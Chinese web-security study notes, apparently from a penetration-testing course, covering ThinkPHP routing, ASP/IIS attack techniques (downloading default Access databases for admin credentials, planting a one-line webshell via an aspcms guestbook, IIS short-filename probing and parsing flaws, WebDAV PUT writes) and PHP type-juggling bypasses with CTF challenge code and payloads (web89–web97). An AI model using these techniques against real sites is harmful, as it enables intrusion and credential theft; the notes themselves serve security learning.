使用thinkphp
开发的框架,其首页访问指向public
目录,指向其中的index.php文件
指向的index.php打开网页后是如下情况,代码如下
定义应用目录,是将文件首页展示在上图的application
目录下,其下有index.php文件
// 定义应用目录
define('APP_PATH', __DIR__ . '/../application/');
// 加载框架引导文件
require __DIR__ . '/../thinkphp/start.php';
application
目录index.php文件
thinkphp框架首页访问的目录
想要得到的目录与首页的关系
http://127.0.0.1:8088/index.php/index/index/index
index.php为应用入口的文件,接着为index目录,index类(模块),index方法;
所以在一下目录创建另一个类,访问时,更换后面的方法即可。访问页面变为1index
字符串
http://127.0.0.1:8088/index.php/index/index/ix
http://127.0.0.1:8088/index.php/index/ceshi/test
Microsoft Active Server Pages(ASP)是服务器端脚本编写环境。
主要包含:MDB下载植入&IIS短文件名&写权限&解析
环境搭建组合:windows iis asp access/sql server
主要包含ASP-数据库-MDB默认下载:access数据库一般后缀名mdb(下载)、asp 、asa (执行解析)
mdb文件在网站目录下,思路:如果知道数据库的地址,可尝试下载获取数据库文件,获取当前管理员账号密码信息。
默认下载:使用asp+access数据库,却不修改默认mdb地址。IIS不能解析MDB文件,当成普通文件下载。(文件服务器端不会解释,客户端浏览器也不会解释,所以就下载到本地。)
思路:位置地址:如果没有修改默认数据库文件位置可尝试默认数据库配置(即本地搭建后默认存放的数据库文件与其他文件位置(比如admin后台管理页面等),没修改。)或采用扫描
ASP-数据库-ASP后门植入连接:数据库是asp,asp可解析,向asp数据库文件写入一句话木马可以直接连上去,此时访问数据库文件将会被服务器当成代码文件执行,所以图片里面的代码就会被执行。
以aspcms为例:
aspcms主要是信息发布系统,数据库默认配置为asp,目录在/data/data.asp下。
漏洞成因:在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。
利用方法:保证默认数据库路径未更改且可留言。
┼攠數畣整爠煥敵瑳∨≡┩愾
ASP-中间件-IIS短文件名探针-安全漏洞:为兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3 短文件名。
在Windows下查看对应的短文件名,可以使用命令 dir /x
短文件名特征:
\1) 只有前六位字符直接显示,后续字符用~1指代。其中数字1还可以递增,如果存在多个文件名类似的文件(名称前6位必须相同,且后缀名前3位必须相同)。
\2) 后缀名最长只有3位,多余的被截断。
\3) 访问构造的某个存在的短文件名,会返回404
\4) 访问构造的某个不存在的短文件名,会返回400
ASP-中间件-IIS文件上传解析-安全漏洞:在 Windows 2003 IIS 6.0 下有两个漏洞,IIS 6.0并不是只根据文件的最后一个后缀名来判断文件的运行方式,这就引发了IIS目录解析漏洞和文件名解析漏洞。
目录解析:对于名字为**.asp后缀的文件夹**,IIS会将该文件夹内部的文件都解析为.asp文件来执行。即a.asp/1.jpg中的1.jpg会作为asp文件执行。
文件名解析:对于名字诸如a.asp;.jpg文件,IIS并非以最后一个后缀名来判断格式,故会将其解析为asp文件并执行。即如果上传木马的后缀为 .asp;.jpg 就可以被服务器执行。
ASP-中间件-IIS配置目录读写-安全配置:在web服务扩展中开启了WebDAV,配置了可以写入的权限,存在PUT任意文件写入漏洞。
web之ASP安全参考文章
小迪讲解参考
复现靶场应用:墨者_IIS写权限漏洞分析溯源
未授权访问
判断用户的身份(后台有多个功能性的文件页面):
cookie
找未授权访问:
.net是c#
的框架,其源码反编译,课直接拖进ILSpy
中。
aspx开发网站会存在信息泄露,在网站根目录下的web.config配置文件中customError设置,导致报错信息造成的信息泄露。
ASP.NET审计参考
==
与===
的区别:https://blog.csdn.net/qq_63792137/article/details/127594787MD5 ==
与===
的比较0e
绕过,强=用数组绕过intval
缺陷绕过 int intval ( mixed $var [, int $base = 10 ] )echo intval(4.2); // 4
echo intval('42'); // 42
echo intval('+42'); // 42
echo intval('-42'); // -42
echo intval(042); // 34
echo intval('042'); // 42
echo intval(1e10); // 10000000000
echo intval(1e10); // 10000000000
echo intval('1e10'); // 10000000000
echo intval(0x1A); // 26
echo intval(42000000); // 42000000
echo intval(420000000000000000000); // 0
echo intval('420000000000000000000'); // 2147483647
echo intval(42, 8); // 42
echo intval('42', 8); // 34
echo intval(array()); // 0
echo intval(array('foo', 'bar')); // 1
strpos()
函数,查找字符串在另一字符串中第一次出现的位置(区分大小写)in_array
第三个参数安全bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )
搜索数组中是否存在指定的值。preg_match只能处理字符串,如果不按规定传一个字符串,通常是传一个数组进去,这样就会报错
str_replace
:其他字符替换字符串中的一些字符,开发中用于过滤某些字符串web89:数组绕过
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if(preg_match("/[0-9]/", $num)){
die("no no no!");
}
if(intval($num)){
echo $flag;
}
}
pyload:?num[]=1
web90:强类型比较
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==="4476"){
die("no no no!");
}
if(intval($num,0)===4476){
echo $flag;
}else{
echo intval($num,0);
}
}
pyload:?num=4476.0
或0x117c
web91:/m换行匹配
show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
if(preg_match('/^php$/i', $a)){
echo 'hacker';
}
else{
echo $flag;
}
}
else{
echo 'nonononono';
}
pyload:?cmd=%0aphp
web92:弱类型比较
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(intval($num,0)==4476){
echo $flag;
}else{
echo intval($num,0);
}
}
pyload:?num=4476.1abc
web93:弱类型,过滤字母
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(preg_match("/[a-z]/i", $num)){
die("no no no!");
}
if(intval($num,0)==4476){
echo $flag;
}else{
echo intval($num,0);
}
}
pyload:?num=4476.1
或8进制绕过
web94:强类型,必须为整数,判断传入是否有0
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==="4476"){
die("no no no!");
}
if(preg_match("/[a-z]/i", $num)){
die("no no no!");
}
if(!strpos($num, "0")){
die("no no no!");
}
if(intval($num,0)===4476){
echo $flag;
}
}
pyload:?num=%20010574
或用%0a绕过(20为空格)
web95:与上题一样,多过滤了一个“.”
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(preg_match("/[a-z]|\./i", $num)){
die("no no no!!");
}
if(!strpos($num, "0")){
die("no no no!!!");
}
if(intval($num,0)===4476){
echo $flag;
}
}
pyload:?num=%20010574
或用%0a绕过(20为空格)
web96:访问当前目录文件
highlight_file(__FILE__);
if(isset($_GET['u'])){
if($_GET['u']=='flag.php'){
die("no no no");
}else{
highlight_file($_GET['u']);
}
}
pyload:?u=./flag.php
web97:MD5强=绕过
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
pyload:a[]=1&b[]=s